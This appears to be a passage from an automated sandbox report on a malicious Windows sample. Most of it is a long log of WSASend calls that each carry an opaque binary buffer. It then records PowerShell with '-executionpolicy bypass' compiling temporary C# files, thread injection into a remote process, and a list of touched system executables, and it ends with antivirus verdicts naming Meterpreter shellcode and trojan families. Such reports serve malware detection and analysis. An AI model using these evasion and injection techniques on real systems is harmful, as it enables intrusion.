buffer: PÚø„\åÉλWB)æãd ŏOғ‰¨ó÷lé?F­Æ®žTùӁéi¥š¹,CÔqX?ˆp¿uƒ WŸêpö©ÔsœGjÄçRJåûS©à—ñœ@õÀÞ[gt…³uüÐJ–´O¥PR؁¸Ð›-&äbe˜xÍ%ÏJÄ©#5êÍJñßHB$²¯[Å-ÔuU<I³çä0*±‹‡é HñÞÌeZ"®b.YÚI» ™êEPè2“=öûâBýǚX®mOC/Ö–+¦Á©ÚÀš£«\ò2®>Ž3ýÑb¥“]n¢v?‹7g³…2Ä'ô90Ò}ƒš.ë,'óÍa&n²d[ZÙRïÛ¬Ÿ¢.瀕Ïn 0$'µ`xç5pŒßÅÝ·YÑ<º\b|)w|±òGǸ¶fÀc踁'oÓ
socket: 1292
0 0

WSASend

buffer: 0ÿìdvöš_ãsU ›è°ŽIê©VÓÂqèF*-°QÅϧ^Õ³?u©W û,ò»¦ž_­ÂÓ­êïíyÝxŽ‚‰5K,¬ zÇ4ާýȕº–óiä-RòpXÞaé Cþ–‡¤F{IŒ’³ñ˜87Fÿødµǐ¾¶§Œ6=ÍÝ«Z°m_€5©{CH ißׅEÿ]žwGge[-2 ”™cîh}Ú¿fñïÑ+ a…–®p Ñâ üo%B?Zž©¯žuïÀ¦Ö/g#Y똋 É¥žúu®6¡ùÄÜlrí>WAŠþ×-ôxÖ ®*Jˋ°ÚŸm,kX™9ÔÍÊp.5Ùbñ@ë°°“`©–˜Òs±£&׆?Bkum?Bí9;ÌáÆ\n&¹Ò
socket: 1292
0 0

WSASend

buffer: 09—I6“æŽg%ÝïF¾ÈrÉxŸªÐNK~ånm·Î‚¿¿¦ªëuâ½›_ a²
socket: 1292
0 0

WSASend

buffer: 0mҘºò&ˊ¶C“ WäÁ"ƒÚqຏè.ý¼ðèqë¡Õ'™ºÔRdè“0p±'EôØA|ƒxƒ¢uo’ Åq·Ù‘1LâkÀ/@¶gKjn"£R+#=šÓt}NNQæá›‰¾v'Á¥®žø^àÉW8ÀvÄÀ©êÓÂDDæ{º­lSP¯¥×Fuk·kïxFÀE¬„ªà; ‡ƒÄ<7˨ %ß»ñK#%R"P¢¾þp–³ÊCŒßýɔ1bó–Í5ӈZLwŒ§Ð‘ÔáH¸Ñ{KYÈ FR"×pÉFLyÞPËsBڂŽßËJa@„åÞoZ–ã=ˆ>]hXªXF \£7Ê-ó99Åqp^¢o¤äVX¶ñOÎsºf¬öuë‹`eõÝ H?b„de—
socket: 1292
0 0

WSASend

buffer: 0Ûǚ¥cê¦'`"ÝC»…Fli¹á¼ßvb`I%žéLy\{ªt¹Ûi‘½ov
socket: 1292
0 0

WSASend

buffer: 0s°ƒ×K¶nˆQ;¦‡ £ûï$êiÊ­ØI×¢S¬+‹×«&¥ZcƽRšZ|SB¯ÚØb œãӐ)á—çƒS°rw²×F=À'‚/q˜1?Ž9+}vH õˆÆé]\– ¡u“Ù6Þ³Àcsi‹kb#\ñ¥ ɐ]Ô·¯ë vôøq¤ÃI¼P]ÈÀÃÝ('e Rª¡ðýÍ\;T‡§\/ÛÜ!²n½Wt¨£I®¯§Úƒ9 2Çì#žÀù©’µi÷à-Lœ9ìm^üïSÔ*€ÍÒ»Fõ<¸¸%YêaŸ‘Å.ò/£¿òª8Uâ@t»U4l­@Þ6ó,x<¾Ž¡â‡nQé@ûSj±#mº›÷¦{ˆ›¥/üš($Ugø
socket: 1292
0 0

WSASend

buffer: 0 N£a/{Îí½!¼•_³ Àû,µrRSÍF~Ÿ+‹·ûZ\Lk¨X%ë[wص¯
socket: 1292
0 0

WSASend

buffer: 0wšä]‡|aÝ/—µ×ž€$o2µÆr+v>¿Q„Ÿ&“îVNÀ‘cRá­à£SKl¦n4Ü" eþ ·ˆ6p}Ãû¾»i˜¶Ñ>·ë L6|(wú RŠ‚ ’TÙBa]šÍOn¸Wß 0ðÿX.^»ÊÕªΚË«‹s,îíÖäÎz8©i„R˜º&ÿî¹L48ùˆê/؃dâhìMí}ÙPXð`07S;Ê>ˆœÙã›|vœ˜8>CÕh»Û÷›Š.ÌØCHMÈÞ6èþ·^¯*=ØWwi<BÕìÞú\»sð,CgâïcQxÍk„2?):«Uéʈ—úú˜1ÜÈÜóÓép¤mé‡Ôu~½X{fËO&“Œdi+Þ vX ‚
socket: 1292
0 0

WSASend

buffer: 0“š­ÒzP—Ñ@ñß{ÊF(û°ú/>Ôo¹o<ƒ›;û-qD¼ñ¶q%ãB‰xH
socket: 1292
0 0

WSASend

buffer: 0÷g¨ŒyðáÒ:£€†V—Ù‘;VÌ¥ÒáKJ,¬¾Jû|›KúïüHN¿Xé¬WŒHx€\ ¥õ™/?Eìø,‘Ï‹-žŸL‹uù=Qlè95J]ŽMç‚Õ`ÚTÙÝ3ÑD`üggà$ª`u,¬ºÞ†Âo—‰<cY^;ZD}!'֑WÐ5õÉ4×\šîÝôq Ûò&lÏܸmwËçáõtê]œ'4Ùò,&ê$$FCM>on[êAʈEµf:&vZOö=‡9—×à¶×ýQ|Y;q¯x+gÉÂCaéE©a^¬äµÈŒ¾ßύRfÜ²Þ\ þeÙÁ§PTJªðd’“ꙌZÁ¦ÔnÏC}r 딑+Ÿgl%½XO‘#ç
socket: 1292
0 0

WSASend

buffer: 0u¡ª·C@UÿKçÍÓ6F1Uè¬ïÚ3è¯)>¯a`Ôrxåâ\#Õ]I'{½Ð
socket: 1292
0 0

WSASend

buffer: 00.c(ªÁZ+¤!t<QóÒí\÷µ”=¶-®Q Ô68}BG°`.R`Κ»¡mð8¦xQ#>·ââ(XéÉ+>øî³Ð ›tƒóà²çÚÈÛZ˧®$å©×ùoíÖS8-ˆ± $O˜’ϯ€ðù‘`Mîù)^¬!'W8WœPʝ}éqcÇ{Í\zpÑ\M4LƒHåM¤%;÷ßʱ¨Üœµ6*;·±m&Må%ß\(Iá¯ù÷ëù0ˆêڙõPó{„lŠÆD:ñݨÅ3¨¸Z¸b9ŠÛm•‹é‹üJAˆ­QUߐÀ>ÛÌ¡*ôDl–£e©'õ`HOÍf5fùãC¶ç&`"§šX‰ÝKñŽõÒ\Ž|@AŠÛ ²@Û­ŒÃuQe
socket: 1292
0 0

WSASend

buffer: 0*{l"¼%€5=Í¡ QU=•ívlRj½áU‡Ú¸_·KŸÑBZ úºÌ´-d–nh
socket: 1292
0 0

WSASend

buffer: 0‰ûŽÜ–®0‹²…¥‹zï–6¥-y@x¡µ VA¤Å´mú­1Íºsù“ÄeÎ +bW,i@EaÁހ8± Þä1¬×%6 ¡–A ¼5¸Ùn¬ãFÂZJçY¿ÍX?kVºÎ¤¾´Ü;(çÿ6i‡¼3 1[Œ‹Ü „ÃiÖDuÅ9k¢&™ám¸­ž·ìÅ<J÷ª Nªê=Ï»Þ.Ðá",´?ƒ·ûXG{ÕÙyBphàY£èФPu§3,ägsŸ­‹¹ý<¨—(ú®Z(à¾=“Ô¿}.ƒ9£)tXÊv­Tï‘ òXëôMÅÀ¬l?lÌ$]NšÝ2QAü¥ š7žª™ÐÓHüuðF/ß?G¨i/ÊÝ(hmpˆ`p\
socket: 1292
0 0

WSASend

buffer: 0+‘*À­Dwó®• 2±¸åo¿ÜkKxéöîT¼»‰“-Kð‰×𝭈AsT³†
socket: 1292
0 0

WSASend

buffer: 07ԋðÁt½É\OÏ`S@òz•,Ê`eæ~{§Ž14ùùòô«9Glþ¿+ӝ q©Ð pAؐì_¶že`ß#ãe•<ËGŠ .Œ‡B 0Šˆ)—4SÝú¯Wˆ_ÐUÿ›â 7/ü»/¹cž"np–Ö7]k·ˆY/ÁŒü¡0!´ÕkR2r߆™ê¹¸×pá=YùŒXÊâ.{:d@¿áব~¦ºÊð†›©ô§¸/’¤ F±îÔ×h_ñð+˜UQ«å¥íÖ¼°´~8 :§ ‚¦ìǾ/¢xߪôÇÜ·¡fô;Y’ ÉPà9´«`Ð4Tðk¡Ì˜±jE )Éoŵçð³6ԅ3î²â¤|YÜp`šŒ K(X…:Õ|n9\æA‡Ù 
socket: 1292
0 0

WSASend

buffer: 0—e¬x•¦Û•ÆôL5‚ÞtãTpØÐ÷1æ>fÔZe‰Þ?»þAÿΪèÐê
socket: 1292
0 0

WSASend

buffer: 0Îè3iµ4· ¼¶A6Çô°)> ×K·‰§‹b“‹ñù$Y2çq`F%›~®ß©§zÖÊx¾“×ð#r¥ ¬n^ÂÒ9½Š±&çè„åþcÒçñyÔs¢è”‡[ÁÊëœ 3Z.½ÊpÁØÁ&G0ÈÔ¯ïSr=}UË3WUW¿ð†KMXAš®É¾‰$'¸L'úD,à\²PG\ÆëézI’¹Ë)csR¹A>J!980v¸q ‡D¢2bO%$/©5õöÄjäDÃÃEf~/ú-:¹¹æUˆx ¢Ô"ù$;_nª*•IO›™|rލõׯUŸ=¼Ÿ›¿SaŸ;# $-àwïW>Õ¶ºs¯Dš£ÒsÃï¼Tw
socket: 1292
0 0

WSASend

buffer: 0™b¦ëh$,…¯~jaäð@îדyE!@Ëja{w+ÈÿË·àÙZ]'“PáÛÒ
socket: 1292
0 0

WSASend

buffer: 0M_Ƽ8ºŒŽYñöMßZQÈ€Þî8ïNtßU³Æ¯Tæ¥M" yZ§_—Qœ…Rz·–Ó,Õ AkšnV¹<;Ÿh øÌé0[á¯ÜgGÙèüœäó-¦O²¢—z=-[Øt¶ëv”ìòã0 5qÌC]¨ñ$x âõ…ÇŽY„ì/µöšª85ÒËý%ÇÍù¸t)^$ɳ¤Ÿ‘+Ê«ª {â íuZA¿ƒžãÿÍç±ÓýÓ8fƒÔP˜T /½‚1yÕæÇDñ*h#~nB‰¨ùü”V¶WQ©Ñ&¸ ¾y‚/O/¶é°4p¯¶l®<­TÐ$S†HÕ ìÅCäFŸÒ¬#”ûû°ß–ºÒÞ.†HEm^9Ȏ“•[}×·Ë[)b‚ ØßÐÑ
socket: 1292
0 0

WSASend

buffer: 04rŠPG/šs‡a\ü5"ìûÏ"#§åseéü¸È{¿¨ ïïF–w{.›új
socket: 1292
0 0

WSASend

buffer: 0I#u#íÄã E[S-ïtµ*ÌnŽÑ)öÔòïb/"l[úºñuÆ6¶dŠý ƒQ:«»dJ¸1û)ÇñUæ®2>Ê,4¨$21\_+ÉìUv”‡'£ ;Ã]ºíÿmUËòEA۞ù‡×œù*j$Þ;5Jûãi»æCÒPáIµ'՜sϼ¤í„—^¤et£ÆÄ:Ob6«lÕÈßaç$Ø=a6`ƒÒÿ'u *SàbD~H­ã¦À¾©C֍½Ñ±Ä!ΜBN­É„?Qbpp7dWåԘdsè^/E—š¸*IпٚiVD6”ñØ×!è|ÓnÇZú&:ø!T»v¡Ë*5(D[Áu3¬, yóà{Ø»ËöOÙü‡©`éf:¾êjŠxR
socket: 1292
0 0

WSASend

buffer: 0$ÞŒ¬YV»°v^<ÃɃi‹ºîsِ‘—˜T¼* U*PBFZ\‹=ƒ:
socket: 1292
0 0

WSASend

buffer: 0EXYÐæ6‘rCáDŽ{`Ñ×é¸Vƒ1,eš¸ô§šÜ3¼­Ý›¢b]¼=–œ`ûü×¾ƒŠ5P)„?᥍Ÿ_°K›—ª¾0Î%f ­ ˆ³-vWføŠNÀšÅ®3adkp>Úêゔ dŒ´ ã®$Öÿï®Å¬ipIÅڅUä,ePÕQ4åÄ-(*=¶œíÑ*nØêÉ èˆ®±ÿçÖd‹6>£(–^«^9^ˆö⑔nŒ:¸ÅóUâ"ë'ƒŒÿ©*&;¢Ó|ѕQJ@ºP±óøô ~xt3£ZƒÞóßlôiŸv ,Ý/4¤ äÁ+[þỀáÒç!ßÔ0`o$(©'î6ÓyY[Å&w^å²n +Õzƒ¼B †ðE‰a¾
socket: 1292
0 0

WSASend

buffer: 0±(ݺX\þÝéúØÔ{.|#À•B†Ð6˜Y>$ï7ð°%¸|«ïY“
socket: 1292
0 0

WSASend

buffer: 0Ñ]—ȳKp`‡ ók)0%»û2%wä‹]‰ÞÚÜÞÜÿ ¡ð¦’Õ¯È ÀK±¾,ø=®Nù,媍® H0ÄMÏì3ë…’Œ2õ7ÂèDª©¬|ä[Äo˛G~ˆ­¾S†ëÅ&¢…`E³ÝâañÑÇbgõ}–ÛØÏÁ™ØNV…4lñƒMNxS悉j»‘M½ 13·ÖäðiùôÈI{OÒ³<4Ue¡·¿»‰F³ÈT´-Û2K~QQÛΏYšÁ,]4yæ/¾‘µj^h‘àI»5«î“5js7ރ1ØsÑیêR›Â2v¨™.\{äi†O,|¦ª“A¶So¦ðT¥‘—5îSÉbv4Ê5%÷# @!{UÇJ'BàŽ+àB³Ü'
socket: 1292
0 0

WSASend

buffer: 0Q+i¤7ëæp>ªîÿ"sJF÷ÜÅÞüÞò½Ûsž&NðÙBaA´5 ñqø«ˆ
socket: 1292
0 0

WSASend

buffer: 0Uª¹ÕõmÕˆ „bßי0l­¨q[”ð\µÃºl_…4¬Å…¹Î‚n‡«RE+û¾@•ÙÁ"ÁÀxË"ãàaՆNÝ#Ž,öB húžì¥áßeƒ‰†GþI°£‘¶ƒÉYâ~sÚvKÇ¿`4´ÌU)7T¦j_[ÍFïÐÙ(ôŸuué¸ÂFïŏËöÈv&·¬.'F¾Ì“pvàÌ»Î[ !B1°ßúÆ7él$ôB#ªÈnz¥x8¸}QIq¬à0xnX'–ü8ñZeI:ԅ€%Yò¨š6ëiëßMš6üÆ^Ú,®\!9—wN3ƒ°QÞUÑQe³¨p`˜Ñ³ÚNÇׯ[?ëœð÷ŸèäٖP™· ånŽieìG4òžµ%
socket: 1292
0 0

WSASend

buffer: 0û‘°Fm ÈÔÔiU'6¨â7—žn§ãÎyÎ'KôɔíÙð†îÐHOð‚龌}n³
socket: 1292
0 0

WSASend

buffer: 0%¯3kƒm¹tÅz8¨Þ^’vþìýи–ªµw­×UÉfeÍ<õ–­[º$z}¿UPÌczOµ'ÿøÐ”íÁ)ìÝ£i5t“Ï0&z\J܁Ü)μÆan°–‘—‘&óä×Ga2y‡°½I7¬·Ò M3ÔþmШ؅b?ùÅA?g៹¶qx½Db¿"#Çýdf0õ¾^§ç–<Úv㜜·ÐÁeÖ»¸‰Ša_d¯§–ºÕÏ ¢nõ-Ž*ó~8 )à£Í†âeR¨Œã°‰³.ë½¥[‚ n(]~m=ê´\ ¬567¥†A¥ç²a3 I·0÷ùf¢bZ4ȉ>ÝÞO…SÿΨPµNoÒ^6]˜- âPÓ½–;K¥ƒcýK,ЇŒ›ˆ“3Íkº
socket: 1292
0 0

WSASend

buffer: 0ȗPq®ÂR]€Ý½døcJH+¼FÝTè ¹­P’ÂþÝÜR½’V§³Úy
socket: 1292
0 0

WSASend

buffer: 0ÏK.+ l¢De8…‘ ¥Q_Ò W7¢à.Š\§Œ¶ŠLPœÈTÏ8˜*Ùòùwk*`Ža{Ï8]§êÖ3cø9òî §i¼œÿ´Ð F=5·ì´)«XI'ò¦¹ìƒ;‘ú&¨P·†4.ËÆ6lqVv“ñÑùµ‚z€zÛm:QîsÛ?א‡¤vµ)-0–dî*»üLųÙ© ýÇåMùÈñ²*½Uµ½Óû<:±hì°­$>ß!Îupy>!¨zƕ)vïGó SùÈa˜üÚ4כ–Ô`'ï’!Âd ü=ß<ÐÊ­ÞhàësG`¸d´×}=’Oʎ3¬æ,½}Èë¹ ´7dhDÆs;1D«g^8Ööö Ƃ¶Vgï0ôô
socket: 1292
0 0

WSASend

buffer: 0ý¸§6†wæ‡oc•–›=“¹Ëóù˜ŸH¦("Å¢åްçw4fÿs© ¥
socket: 1292
0 0

WSASend

buffer: 0W·ù?®ÛfæQœ'Ž”{¥m‡Wì,•¦YÅ«>Š[£½ úSÌ Ww”£ÅUK ¨t /pöé8 XÃÁސ¦ÿ”¤ŸÂjÏ>§^³¼S¯³´z2 ®MoM͋{ìÐHAWâÒÄvtnø ~Ù&góžw±†åÁÈ0¼ëÑ*;R Ãbú©Â­²|Ë g:!h<²i›Ód>ïsT°¥m®òü6Þ`K¢ìˆ*Î"&\Ø@Å8å ]"͏F qºf¬=#¸Äè¹À…B«)ëUÝi§Ä¦65Ïf&ÛzÀ!žØéhÜBþø'ZQµŸ{.<ßð&< „0áâ í-îĎü¯‘>¾÷ˆ›à,›Dÿ‘©qZ&z˜y
socket: 1292
0 0

WSASend

buffer: 0<ŽÿË:0Õ& .ÞEýàb3ã}xŒl¶ã·tkˆÓ»óxÊ ´°1¡=ÇM@s
socket: 1292
0 0

WSASend

buffer: 0Û¬ûq…-挻®zVbƒ­<נ⇇Fc#é[ýÍKlo1ÿ˜©ƒÄ:M vYìqmíâÔt½“‚gÈã*é%̍ öÞËsG mÿr²"ùµ![BpÓ/ih玀%I‡YBú6véò4õ‹n0Ì' £ øíÜ¢9ÂKŠÞÁ~þ|};«æ=n§-˜ß .3î‡ m †Çc”«G]8#ïN”Í,<>Õéf.bMÇR‰qC<† ép)ȱc>ì¶¶›é—uý°fóÞÆ«¸b‹¥˜ª„­Fh ߕ& Æ? «âb‘»ž jd¡»J„F¨F"lX“Á?l² ˜¶V ª–a]¶ÍÓ¶LÅëÔq%|i´”¢n¾ë'àCÿéÙqœ‘Jrürڝù²
socket: 1292
0 0

WSASend

buffer: 0…œHµ «>!eNmÉ{­és] 'Çî—Òy{£¥^ï´Bª2e™,H— ¾
socket: 1292
0 0

WSASend

buffer: 0Vü Û§;¦ðjN÷ªä&õÀ%(ª›>æeÚ%pŠ™ñ/×Nk*\9y"û3ý#ÃD˜É¨öñDLV¡Vèÿjëÿ¯Ì Ö¬cÏ·Ë`ÍRãÈ¥ÅÃ?ãàÃÌS\i.£tèwK4ªs^ÊåÆúÕ $m֌ðK&Y¸q­ ªaIYí—ñ$·Še4jÖqd_]Eu¸bŠ5~LI&j„žôµ[ÊdYÉLm_0ig iqÓI}†<]hǗù²Šî6œýTé†7ôŸO X•~±¶S^¤ËNÀ(Bªzc"š–´š;)R™y.Bærø¡jdRÂü1½Î•Ñ->h;‹ÛGv™ÀCM1ÚÙ ”°i/qf¡OH€ÚþЉb½¥Ø ZÃ!V½Ñ3”«üï
socket: 1292
0 0

WSASend

buffer: 0ƒ"ÔîE0ēJ„‹zpªóçÃøÑù^;£1+ Oµ6"$U­'¹÷÷¤¬ÍòKÍ
socket: 1292
0 0

WSASend

buffer: 0#–IÐ%YzÝÌCí™Oe¶“é¼o3aúVñ“"[È|úvsYfÁ‡ã˜‘€êè™ó¹Ö‡ÏÇr£H *0\ä£.-/Ó¨e-'xÿÃļà(R$¿Šd•_Õ=4'L~,Ië<@Š÷Ü«ª¢¼+RÅW¼7ý݈6·é×ùJïxÉf»C~?@´-÷©ØA6É¢\•Õû?p‰šbÙ°NFòžå;r›)à €»—iõõ`ß®7gTl«ÀŒ¥Õ¥s“²H(>v6DƒBòÚÓoE5ŽÜ]ɞڑGBí¦„ëBÝz´ùÙ¥ži©Â·ˆ¢H8û9 …l²|à›âÇÅØ Ö炡5*pVÜâ^@ýÉZ.Õ;<ÖƒG©ÿ¨†´gýë
socket: 1292
0 0

WSASend

buffer: 0s=ÓæÇ#Õ²*ß»)=#" Äæ£0‡ àégRè£÷þ¾‚0܃É$x³þ²ï
socket: 1292
0 0

WSASend

buffer: 0‘ñ‚2zïJ¨Wh²5T€»aX ŒjßÎXW‡QPZC ¶+XÙç0êRWÑ(vÕq† ñuµ¨X2WɑÞC>6'4“hŠÙ%0À’”E°\ Kö̓°ò ”C~ô™ÈCÿ»ÑŸeשÀh¼qê`=pª2òfjdНÐìK˜€¦è¡Û{˜žÁIbpÈtÙ? ¼LîÓ© …I›[dÄ+[a à’üñÔí"xÞ3§@&cÁÑDŬ)Äð¶:ÏÈw˜Cl°§œK÷y˜Ù’ ׄõ}bUW¶A°ê«Êê¾#ûÒa…NÔÙÍnÀi’CÛ¢×|BËãÅ&6 /ö“{Â2 ­¾øƒñº—¡¹„¿©€sÐ캖ǑºÙÇFªÜš™
socket: 1292
0 0

WSASend

buffer: 0–úU¦¦PÂWŽWqTô¡û Âıå±s±²Óó¡‰<©²§•ŒG?ôšìŠ
socket: 1292
0 0

WSASend

buffer: 0̒°<ÐGÄÖì·QF†$ßÐêoO/E'Í·R”W‘D°ŠÂŸ;;gÖû¶2ì³]¤ T”¸Þ0س=Þ×b89RÕ<Žby»\õâìϑÃïª?¸ËO «8‰IÏ@§.C‚쬺¢‚´ç šhHvÃ5O*ÛðŠÁôáo@Uéâ¤3)½®HKk]E4Øz׋¿Ý$-ڗ^1Ȏ†Â–6ßÖHÇ@x™‘ZŽQÝ×Ó¤'Ì ðœ½›´'ßj-ÿRÑ^þÁ§¸Ó%¨¾z²c›´ÚOoÿ(—¬*ç‰v>°È˜@e ߕêµ{Y:Ág Ê@Aj9(R"â^ÇSDÚ­ AÆé`ʐ®ØDAx8›1¨ª(”ŠÔÄPМf¡ðrìB[ÿú
socket: 1292
0 0

WSASend

buffer: 0½Ðë5Ò¾!z¬½ÁØ7@Á: ƒ$¥j6̨.ŒL”z¨šV5!Á?õ« Òju
socket: 1292
0 0

WSASend

buffer: 0¢^`¶/áòć€AˆkåIÊË/=¶ú¦]ïìäõä/Ür©2þ´xèdç{ƒõ#Ù‡kêÒdôI´+K¶G'ØùKóU+ë„bCŽx¡n”'áhf:Î_œmyŽÝe”f-o Ýçïè;³ö3χOÀ)›iC–H<DÔ/%4!]D%´l©4­}Ý|ë0zEV¼ÙŠìÊ5¤þÂB—·Šúb.Ÿß›6s²b†FÇTâ°ô%ww>m~݄GFB@¿ÆÓ\kýôcMÚµ7ŸÎ;EÕ©~±k ÂrfâX¸ ü4"”ð“i­S ZkcÐzÞh»9@Ç0:–Þ3"ÏïâŏØY4YUº-¯«Î®¤fÇ|íUîzj¾‘2j
socket: 1292
0 0
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\wb0pvs3w.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\dsbups9j.cmdline"
Process injection Process 2568 resumed a thread in remote process 2680
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000248
suspend_count: 1
process_identifier: 2680
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -executionpolicy bypass value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Bkav W64.AIDetectMalware
tehtris Generic.Malware
Cynet Malicious (score: 100)
CAT-QuickHeal cld.trojan.bzc
Skyhigh BehavesLike.Win64.Generic.ch
Cylance Unsafe
VIPRE Heur.BZC.MNT.Boxter.829.1C532416
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_60% (W)
BitDefender Heur.BZC.MNT.Boxter.829.1C532416
K7GW Riskware ( 0040eff71 )
K7AntiVirus Riskware ( 0040eff71 )
Arcabit Heur.BZC.MNT.Boxter.829.1C532416
VirIT Trojan.Win32.Dnldr24.BBST
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Generik.KSCCFWO
APEX Malicious
Avast Script:SNH-gen [Trj]
Kaspersky UDS:Trojan.Win64.Badur
Alibaba TrojanSpy:PowerShell/MeterpreterShellCode.4579fc66
MicroWorld-eScan Heur.BZC.MNT.Boxter.829.1C532416
Rising Trojan.Badur!8.308 (CLOUD)
Emsisoft Heur.BZC.MNT.Boxter.829.1C532416 (B)
F-Secure Heuristic.HEUR/AGEN.1339807
DrWeb PowerShell.SpyBot.22
Zillya Trojan.Cometer.Win32.533
McAfeeD ti!6F783FDDC426
Trapmine malicious.high.ml.score
CTX exe.trojan.generic
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Jiangmin Trojan.Generic.cbdzv
Webroot W32.Trojan.Gen
Google Detected
Avira HEUR/AGEN.1339807
Antiy-AVL Trojan/Win32.SchoolBoy
Kingsoft malware.kb.a.941
Gridinsoft Ransom.Win64.Gandcrab.oa!s1
Microsoft Trojan:Win32/Wacatac.B!ml
GData Heur.BZC.MNT.Boxter.829.1C532416
Varist W64/Kryptik.XI
McAfee Artemis!70DBF2129AD1
DeepInstinct MALICIOUS
Malwarebytes Generic.Malware/Suspicious
Ikarus Trojan-Spy.Agent
TrendMicro-HouseCall TROJ_GEN.R002H09DS25
Yandex Trojan.GenAsa!VpprgU3GNoU
MaxSecure Trojan.Malware.300983.susgen
AVG Script:SNH-gen [Trj]